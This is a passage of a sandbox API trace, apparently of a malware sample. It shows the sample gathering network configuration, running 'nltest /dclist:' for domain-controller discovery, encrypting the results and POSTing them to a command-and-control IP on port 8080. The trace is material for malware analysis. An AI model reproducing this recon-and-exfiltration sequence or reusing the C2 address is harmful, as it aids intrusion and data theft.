DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n NetBIOS over Tcpip. . . . . . . . : Disabled\r\n") returned 2335 [0124.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n Host Name . . . . . . . . . . . . : xc64ZB\r\n Primary Dns Suffix . . . . . . . : \r\n Node Type . . . . . . . . . . . . : Hybrid\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Ethernet 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n DHCP Enabled. . . . . . . . . . . : Yes\r\n Autoconfiguration Enabled . . . . : Yes\r\n Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n Default Gateway . . . . . . . . . : ::\r\n DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", cchWideChar=2335, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2335 [0124.179] GetProcessHeap () returned 0x500000 [0124.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x91f) returned 0x574d60 [0124.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n Host Name . . . . . . . . . . . . : xc64ZB\r\n Primary Dns Suffix . . . . . . . : \r\n Node Type . . . . . . . . . . . . : Hybrid\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Ethernet 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n DHCP Enabled. . . . . . . . . . . : Yes\r\n Autoconfiguration Enabled . . . . : Yes\r\n Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n Default Gateway . . . . . . . . . : ::\r\n DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", cchWideChar=2335, lpMultiByteStr=0x574d60, cbMultiByte=2335, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nWindows IP Configuration\r\n\r\n Host Name . . . . . . . . . . . . : xc64ZB\r\n Primary Dns Suffix . . . . . . . : \r\n Node Type . . . . . . . . . . . . : Hybrid\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Ethernet 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n DHCP Enabled. . . . . . . . . . . : Yes\r\n Autoconfiguration Enabled . . . . : Yes\r\n Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n Default Gateway . . . . . . . . . : ::\r\n DHCPv6 IAID . . . . . . . . . . . : 134217728\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n NetBIOS over Tcpip. . . . . . . . : Disabled\r\n", lpUsedDefaultChar=0x0) returned 2335 [0124.180] GetProcessHeap () returned 0x500000 [0124.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5edf30 | out: hHeap=0x500000) returned 1 [0124.180] GetProcessHeap () returned 0x500000 [0124.180] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5cff90 | out: hHeap=0x500000) returned 1 [0124.180] CloseHandle (hObject=0x61c) returned 1 [0124.181] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\E6FE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\e6fe.tmp")) returned 1 [0124.182] GetProcessHeap () returned 0x500000 [0124.182] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427cd0 | out: hHeap=0x500000) returned 1 [0124.182] GetProcessHeap () returned 0x500000 [0124.182] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427910 [0124.182] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2bff790 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0124.183] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x2bffb20 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\EBF0.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ebf0.tmp")) returned 0xebf0 [0124.183] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\EBF0.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ebf0.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x2bffa78, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x61c [0124.184] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="nltest /dclist:", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2bffab0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x61c, hStdError=0x0), lpProcessInformation=0x2bffa90 | out: lpCommandLine="nltest /dclist:", lpProcessInformation=0x2bffa90*(hProcess=0x608, hThread=0x620, dwProcessId=0xd30, dwThreadId=0x81c)) returned 1 [0124.428] WaitForSingleObject (hHandle=0x608, dwMilliseconds=0xffffffff) returned 0x0 [0125.400] CloseHandle (hObject=0x620) returned 1 [0125.400] CloseHandle (hObject=0x608) returned 1 [0125.400] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.401] GetFileSize (in: hFile=0x61c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x24 [0125.401] GetProcessHeap () returned 0x500000 [0125.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x2427d30 [0125.401] ReadFile (in: hFile=0x61c, lpBuffer=0x2427d30, nNumberOfBytesToRead=0x24, lpNumberOfBytesRead=0x2bffa64, lpOverlapped=0x0 | out: lpBuffer=0x2427d30*, lpNumberOfBytesRead=0x2bffa64*=0x24, lpOverlapped=0x0) returned 1 [0125.401] GetOEMCP () returned 0x1b5 [0125.401] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x0, lpMultiByteStr=0x2427d30, cbMultiByte=36, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0125.401] GetProcessHeap () returned 0x500000 [0125.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x23f8f20 [0125.401] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x0, lpMultiByteStr=0x2427d30, cbMultiByte=36, lpWideCharStr=0x23f8f20, cchWideChar=36 | out: lpWideCharStr="The command completed successfully\r\n잿㈢℀退〱⸴㘱⸸㔱⸵㐱3") returned 36 [0125.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The command completed successfully\r\n잿㈢℀退〱⸴㘱⸸㔱⸵㐱3", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0125.401] GetProcessHeap () returned 0x500000 [0125.401] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x2427670 [0125.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="The command completed successfully\r\n잿㈢℀退〱⸴㘱⸸㔱⸵㐱3", cchWideChar=36, lpMultiByteStr=0x2427670, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The command completed successfully\r\n", lpUsedDefaultChar=0x0) returned 36 [0125.401] GetProcessHeap () returned 0x500000 [0125.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f8f20 | out: hHeap=0x500000) returned 1 [0125.401] GetProcessHeap () returned 0x500000 [0125.401] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427d30 | out: hHeap=0x500000) returned 1 [0125.401] CloseHandle (hObject=0x61c) returned 1 [0125.401] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\EBF0.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ebf0.tmp")) returned 1 [0125.403] GetProcessHeap () returned 0x500000 [0125.403] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427910 | out: hHeap=0x500000) returned 1 [0125.403] GetTickCount () returned 0x15bf0b1 [0125.403] GetProcessHeap () returned 0x500000 [0125.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe39) returned 0x54a6c0 [0125.403] GetProcessHeap () returned 0x500000 [0125.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eba10 [0125.403] GetProcessHeap () returned 0x500000 [0125.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f8610 [0125.403] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bff9d0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2bff9d0) returned 0x0 [0125.404] GetProcessHeap () returned 0x500000 [0125.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eba10 | out: hHeap=0x500000) returned 1 [0125.404] GetProcessHeap () returned 0x500000 [0125.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f8610 | out: hHeap=0x500000) returned 1 [0125.404] GetProcessHeap () returned 0x500000 [0125.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x24277f0 [0125.404] BCryptGetProperty (in: hObject=0x574560, pszProperty="ObjectLength", pbOutput=0x2bff9e8, cbOutput=0x4, pcbResult=0x2bff9f0, dwFlags=0x0 | out: pbOutput=0x2bff9e8, pcbResult=0x2bff9f0) returned 0x0 [0125.404] GetProcessHeap () returned 0x500000 [0125.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24277f0 | out: hHeap=0x500000) returned 1 [0125.404] GetProcessHeap () returned 0x500000 [0125.404] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x5738e0 [0125.404] BCryptCreateHash (in: hAlgorithm=0x574560, phHash=0x2bff9d8, pbHashObject=0x5738e0, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x574560, phHash=0x2bff9d8, pbHashObject=0x5738e0) returned 0x0 [0125.404] BCryptHashData (in: hHash=0x5738e0, pbInput=0x54a6c0, cbInput=0xe39, dwFlags=0x0 | out: hHash=0x5738e0) returned 0x0 [0125.405] BCryptFinishHash (in: hHash=0x5738e0, pbOutput=0x2bffaf0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x5738e0, pbOutput=0x2bffaf0) returned 0x0 [0125.405] BCryptDestroyHash (in: hHash=0x5738e0 | out: hHash=0x5738e0) returned 0x0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5738e0 | out: hHeap=0x500000) returned 1 [0125.405] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574560, dwFlags=0x0 | out: hAlgorithm=0x574560) returned 0x0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe65) returned 0x5edf30 [0125.405] BCryptEncrypt (in: hKey=0x54e220, pbInput=0x5edf30, cbInput=0xe65, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2bffa20, dwFlags=0x1 | out: hKey=0x54e220, pbIV=0x0, pbOutput=0x0, pcbResult=0x2bffa20) returned 0x0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe70) returned 0x2548cc0 [0125.405] BCryptEncrypt (in: hKey=0x54e220, pbInput=0x5edf30, cbInput=0xe65, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2548cc0, cbOutput=0xe70, pcbResult=0x2bffa20, dwFlags=0x1 | out: hKey=0x54e220, pbIV=0x0, pbOutput=0x2548cc0, pcbResult=0x2bffa20) returned 0x0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xf21) returned 0x5efee0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2548cc0 | out: hHeap=0x500000) returned 1 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5edf30 | out: hHeap=0x500000) returned 1 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4000) returned 0x24d44b0 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x68) returned 0x2497320 [0125.405] _snwprintf (in: _Dest=0x24d44b0, _Count=0x4000, _Format="Content-Type: multipart/form-data; boundary=%s\r\n" | out: _Dest="Content-Type: multipart/form-data; boundary=------------wFyoKhOLZJa\r\n") returned 69 [0125.405] GetProcessHeap () returned 0x500000 [0125.405] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2497320 | out: hHeap=0x500000) returned 1 [0125.406] GetProcessHeap () returned 0x500000 [0125.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4f21) returned 0x2453b90 [0125.406] GetProcessHeap () returned 0x500000 [0125.406] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x70) returned 0x2494a00 [0125.406] _snprintf (in: _Dest=0x2453b90, _Count=0x4f21, _Format="\r\n--%S\r\nContent-Disposition: form-data; name=\"%S\"; filename=\"%S\"\r\nContent-Type: application/octet-stream\r\n\r\n" | out: _Dest="\r\n--------------wFyoKhOLZJa\r\nContent-Disposition: form-data; name=\"t\"; filename=\"eQzIxzzUjUAU\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 138 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2494a00 | out: hHeap=0x500000) returned 1 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xc) returned 0x23eb690 [0125.407] _snprintf (in: _Dest=0x2454b3b, _Count=0x3f76, _Format="\r\n--%S--" | out: _Dest="\r\n--------------wFyoKhOLZJa--") returned 29 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb690 | out: hHeap=0x500000) returned 1 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5efee0 | out: hHeap=0x500000) returned 1 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb390 [0125.407] _snwprintf (in: _Dest=0x2bffc00, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="167.172.248.70") returned 14 [0125.407] GetProcessHeap () returned 0x500000 [0125.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb390 | out: hHeap=0x500000) returned 1 [0125.407] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0125.408] GetProcessHeap () returned 0x500000 [0125.408] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0125.408] InternetConnectW (hInternet=0xcc0004, lpszServerName="167.172.248.70", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0125.409] GetProcessHeap () returned 0x500000 [0125.409] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb8f0 [0125.409] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0125.409] GetProcessHeap () returned 0x500000 [0125.409] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb8f0 | out: hHeap=0x500000) returned 1 [0125.409] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2bffb00*, dwBufferLength=0x4) returned 1 [0125.410] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2bffb00, lpdwBufferLength=0x2bffb04 | out: lpBuffer=0x2bffb00, lpdwBufferLength=0x2bffb04) returned 0 [0125.410] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2bffb00*, dwBufferLength=0x4) returned 1 [0125.410] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=------------wFyoKhOLZJa\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2453b90*, dwOptionalLength=0xfc8) returned 1 [0126.361] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2bffa20, lpdwBufferLength=0x2bffa1c, lpdwIndex=0x0 | out: lpBuffer=0x2bffa20*, lpdwBufferLength=0x2bffa1c*=0x4, lpdwIndex=0x0) returned 1 [0126.361] GetProcessHeap () returned 0x500000 [0126.361] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10000) returned 0x25ea040 [0126.362] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x25ea040, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2bff9f8 | out: lpBuffer=0x25ea040*, lpdwNumberOfBytesRead=0x2bff9f8*=0x208) returned 1 [0126.362] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x25ea248, dwNumberOfBytesToRead=0xfdf8, lpdwNumberOfBytesRead=0x2bff9f8 | out: lpBuffer=0x25ea248*, lpdwNumberOfBytesRead=0x2bff9f8*=0x0) returned 1 [0126.362] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0126.362] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0126.362] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0126.362] GetProcessHeap () returned 0x500000 [0126.362] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24d44b0 | out: hHeap=0x500000) returned 1 [0126.362] GetProcessHeap () returned 0x500000 [0126.362] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2453b90 | out: hHeap=0x500000) returned 1 [0126.363] BCryptDecrypt (in: hKey=0x54e220, pbInput=0x25ea040, cbInput=0x50, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2bffa68, dwFlags=0x1 | out: hKey=0x54e220, pbIV=0x0, pbOutput=0x0, pcbResult=0x2bffa68) returned 0x0 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x50) returned 0x243e8e0 [0126.363] BCryptDecrypt (in: hKey=0x54e220, pbInput=0x25ea040, cbInput=0x50, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x243e8e0, cbOutput=0x50, pcbResult=0x2bffa68, dwFlags=0x1 | out: hKey=0x54e220, pbIV=0x0, pbOutput=0x243e8e0, pcbResult=0x2bffa68) returned 0x0 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb910 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x59cd80 [0126.363] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2bff960, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2bff960) returned 0x0 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb910 | out: hHeap=0x500000) returned 1 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x59cd80 | out: hHeap=0x500000) returned 1 [0126.363] GetProcessHeap () returned 0x500000 [0126.363] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x24277f0 [0126.363] BCryptGetProperty (in: hObject=0x574060, pszProperty="ObjectLength", pbOutput=0x2bff978, cbOutput=0x4, pcbResult=0x2bff980, dwFlags=0x0 | out: pbOutput=0x2bff978, pcbResult=0x2bff980) returned 0x0 [0126.363] GetProcessHeap () returned 0x500000 [0126.364] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24277f0 | out: hHeap=0x500000) returned 1 [0126.364] GetProcessHeap () returned 0x500000 [0126.364] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x574420 [0126.364] BCryptCreateHash (in: hAlgorithm=0x574060, phHash=0x2bff968, pbHashObject=0x574420, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x574060, phHash=0x2bff968, pbHashObject=0x574420) returned 0x0 [0126.364] BCryptHashData (in: hHash=0x574420, pbInput=0x243e928, cbInput=0x4, dwFlags=0x0 | out: hHash=0x574420) returned 0x0 [0126.364] BCryptFinishHash (in: hHash=0x574420, pbOutput=0x2bffa50, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x574420, pbOutput=0x2bffa50) returned 0x0 [0126.364] BCryptDestroyHash (in: hHash=0x574420 | out: hHash=0x574420) returned 0x0 [0126.364] GetProcessHeap () returned 0x500000 [0126.364] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x574420 | out: hHeap=0x500000) returned 1 [0126.364] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574060, dwFlags=0x0 | out: hAlgorithm=0x574060) returned 0x0 [0126.364] BCryptVerifySignature (hKey=0x2427820, pPaddingInfo=0x0, pbHash=0x2bffa50, cbHash=0x20, pbSignature=0x243e8e4, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0126.364] GetProcessHeap () returned 0x500000 [0126.365] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4) returned 0x23f7e50 [0126.365] GetProcessHeap () returned 0x500000 [0126.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x243e8e0 | out: hHeap=0x500000) returned 1 